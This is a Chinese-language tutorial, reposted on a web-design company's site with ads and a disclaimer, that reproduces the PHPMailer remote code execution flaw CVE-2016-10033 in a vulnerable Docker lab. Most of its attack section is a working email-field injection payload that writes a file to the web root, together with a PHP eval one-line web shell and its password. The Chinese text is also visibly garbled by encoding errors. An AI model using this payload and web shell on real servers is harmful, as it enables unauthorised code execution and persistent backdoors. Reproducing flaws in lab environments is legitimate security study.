PHPMailer中怎么復現(xiàn)遠程命令執(zhí)行漏洞，相信很多沒有經(jīng)驗的人對此束手無策，為此本文總結(jié)了問題出現(xiàn)的原因和解決方法，通過這篇文章希望你能解決這個問題。

我們提供的服務(wù)有：成都網(wǎng)站設(shè)計、成都網(wǎng)站建設(shè)、微信公眾號開發(fā)、網(wǎng)站優(yōu)化、網(wǎng)站認證、湖里ssl等。為上千多家企事業(yè)單位解決了網(wǎng)站和推廣的問題。提供周到的售前咨詢和貼心的售后服務(wù)，是有科學管理、有技術(shù)的湖里網(wǎng)站制作公司

一、漏洞簡介

PHPMailer是PHP電子郵件創(chuàng)建及傳輸類，用于多個開源項目：WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。

PHPMailer < 5.2.18版本存在安全漏洞，可使未經(jīng)身份驗證的遠程攻擊者在Web服務(wù)器用戶上下文中執(zhí)行任意代碼，遠程控制目標web應(yīng)用。

二、影響版本：

PHPMailer<5.2.18

三、漏洞復現(xiàn)

Docker環(huán)境：

dockerrun --rm -it -p8080:80vulnerables/cve-2016-10033

拉去鏡像啟動環(huán)境：

http://192.168.1.107:8080/

http://192.168.1.107:8080/在name處隨便輸入比如“aaa”，在email處輸入："aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com在message處輸入一句話木馬：<?php@eval($_POST['thelostworld']);?>

上傳完一句話木馬后，頁面會響應(yīng)3-5分鐘，響應(yīng)時間較長

木馬地址：http://192.168.1.107:8080/a.php 密碼：thelostworld

虛擬終端：

使用腳本：

獲取腳本后臺回復“PHPMailer”獲取腳本

看完上述內(nèi)容，你們掌握PHPMailer中怎么復現(xiàn)遠程命令執(zhí)行漏洞的方法了嗎？如果還想學到更多技能或想了解更多相關(guān)內(nèi)容，歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道，感謝各位的閱讀！

文章標題：PHPMailer中怎么復現(xiàn)遠程命令執(zhí)行漏洞
分享鏈接：http://aaarwkj.com/article40/pccgho.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供微信小程序、網(wǎng)站導航、標簽優(yōu)化、用戶體驗、微信公眾號、企業(yè)建站

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)